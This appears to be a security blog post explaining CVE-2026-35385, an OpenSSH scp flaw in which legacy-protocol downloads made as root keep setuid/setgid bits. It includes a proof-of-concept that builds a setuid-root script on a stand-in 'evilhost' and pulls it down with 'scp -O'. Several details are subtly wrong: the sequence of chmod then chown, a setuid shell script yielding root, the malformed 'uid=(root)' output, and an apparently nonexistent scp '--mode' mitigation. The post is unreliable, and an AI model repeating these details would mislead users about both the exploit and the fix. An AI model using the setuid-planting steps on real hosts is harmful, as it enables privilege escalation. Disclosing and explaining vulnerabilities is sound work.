A quietly dangerous flaw exists in versions of OpenSSH before 10.3, where a file downloaded over SCP as root with -O (Old protocol) and without -p (preserve mode) can end up with setuid or setgid bits set on the destination. This may allow unintentional privilege escalation, contrary to typical user expectations or intentions.
Introduction
OpenSSH’s scp utility is a time-honored tool for secure file transfers. However, for years, subtle surprises have lurked in rarely traveled code paths—such as when copying files as root using the legacy SCP protocol with certain flags. CVE-2026-35385 highlights one such issue: a logic bug that can cause a copied file to become setuid or setgid upon installation, potentially creating local privilege escalation risks.
This post gives a clear, technical explanation, a hands-on reproducible snippet, exploit details, and links to official references.
Vulnerability Details
CVE Number: CVE-2026-35385
Affected: OpenSSH < 10.3
Vulnerable Utility: scp
Scenario:
File is downloaded (copied from a remote server to local) as root
- -O is used (forces old/legacy scp protocol)
The file on the remote side has setuid or setgid bits
Expected behavior: File should lose setuid/setgid after copy (especially if not preserving perms)
Actual behavior: File may inadvertently retain setuid/setgid bits upon copy—*even* without -p.
Why it’s risky: An attacker placing a malicious setuid binary on a controlled server, then convincing a root user to download it with vulnerable scp options, causes that binary to be copied locally with setuid/root ownership.
Suppose you (attacker) own the remote server. You place a malicious file
echo -e '#!/bin/sh\necho HACKED; id' > /tmp/evil.sh
chmod 4755 /tmp/evil.sh # setuid bit ON, owned by root
chown root:root /tmp/evil.sh # owned by root
Victim's action (unsafe scenario)
scp -O attacker@evilhost:/tmp/evil.sh /usr/local/bin/evil.sh
Check the file
ls -l /usr/local/bin/evil.sh
Output could be
-rwsr-xr-x 1 root root 30 Jun 16 08:26 /usr/local/bin/evil.sh
rws shows the setuid bit is set — dangerously preserved!
Running it as any local user
/usr/local/bin/evil.sh
HACKED
uid=(root) gid=100(user) groups=100(user)
Why Did This Happen?
OpenSSH’s old scp protocol, in pre-10.3 versions, passes file mode information in a way that the receiving side applies whatever mode bits are present. If the preserve (-p) option is not set, many users would expect only normal (non-special) permissions—yet, with -O, the setuid/setgid information can still "leak" from the remote file info.
This is fixed in 10.3, where the scp receiver forcibly clears setuid/setgid unless explicitly told to preserve them.
If you must:
- Add --mode=0644 or strip suid/sgid manually after copying.
Example
scp attacker@evilhost:/tmp/evil.sh /usr/local/bin/evil.sh
chmod u-s,g-s /usr/local/bin/evil.sh
References & Further Reading
- OpenSSH Release Notes (10.3)
- CVE-2026-35385 at MITRE
- Legacy SCP Protocol Security Risks
- Understanding Linux File Permissions: setuid and setgid
Final Thoughts
While this issue may seem esoteric, it illustrates the ongoing need to review all code paths—especially as root, and with legacy flags—in security-sensitive tools like OpenSSH. Always stay on top of release notes and patch quickly!
Timeline
Published on: 04/02/2026 16:30:59 UTC
Last modified on: 04/03/2026 16:10:23 UTC